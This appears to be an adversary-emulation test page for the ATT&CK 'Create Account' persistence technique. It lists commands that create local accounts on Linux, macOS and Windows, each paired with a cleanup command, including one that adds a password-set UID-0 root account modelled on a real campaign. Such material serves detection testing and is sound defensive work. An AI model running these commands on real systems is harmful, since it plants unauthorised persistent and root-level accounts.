Adversaries with a sufficient level of access may create a local system, domain, or cloud tenant account. Such accounts may be used for persistence that do not require persistent remote access tools to be deployed on the system.In cloud environments, adversaries may create accounts that only have access to specific services, which can reduce the chance of detection.
The
net user
commands can be used to create a local or domain account.An adversary with access to a Global Admin account can create another account and assign it the Global Admin role for persistent access to the Office 365 tenant.(Citation: Microsoft O365 Admin Roles)(Citation: Microsoft Support O365 Add Another Admin, October 2019)
Create a user via useradd
Supported Platforms: Linux
Name | Description | Type | Default Value |
---|---|---|---|
username | Username of the user to create | String | evil_user |
useradd -M -N -r -s /bin/bash -c evil_account #{username}
userdel #{username}
Creates a user on a MacOS system with dscl
Supported Platforms: macOS
Name | Description | Type | Default Value |
---|---|---|---|
username | Username of the user to create | String | evil_user |
realname | 'realname' to record when creating the user | String | Evil Account |
dscl . -create /Users/#{username}
dscl . -create /Users/#{username} UserShell /bin/bash
dscl . -create /Users/#{username} RealName "#{realname}"
dscl . -create /Users/#{username} UniqueID "1010"
dscl . -create /Users/#{username} PrimaryGroupID 80
dscl . -create /Users/#{username} NFSHomeDirectory /Users/#{username}
dscl . -delete /Users/#{username}
Creates a new user in a command prompt. Upon execution, "The command completed successfully." will be displayed. To verify the new account, run "net user" in powershell or CMD and observe that there is a new user named "T1136_CMD"
Supported Platforms: Windows
Name | Description | Type | Default Value |
---|---|---|---|
username | Username of the user to create | String | T1136_CMD |
password | Password of the user to create | String | T1136_CMD! |
net user /add "#{username}" "#{password}"
net user /del "#{username}" >nul 2>&1
Creates a new user in PowerShell. Upon execution, details about the new account will be displayed in the powershell session. To verify the new account, run "net user" in powershell or CMD and observe that there is a new user named "T1136_PowerShell"
Supported Platforms: Windows
Name | Description | Type | Default Value |
---|---|---|---|
username | Username of the user to create | String | T1136_PowerShell |
New-LocalUser -Name "#{username}" -NoPassword
Remove-LocalUser -Name "#{username}" -ErrorAction Ignore
Creates a new user in Linux and adds the user to the root
group. This technique was used by adversaries during the Butter attack campaign.
Supported Platforms: Linux
Name | Description | Type | Default Value |
---|---|---|---|
username | Username of the user to create | String | butter |
password | Password of the user to create | String | BetterWithButter |
useradd -o -u 0 -g 0 -M -d /root -s /bin/bash #{username}
echo "#{password}" | passwd --stdin #{username}
userdel #{username}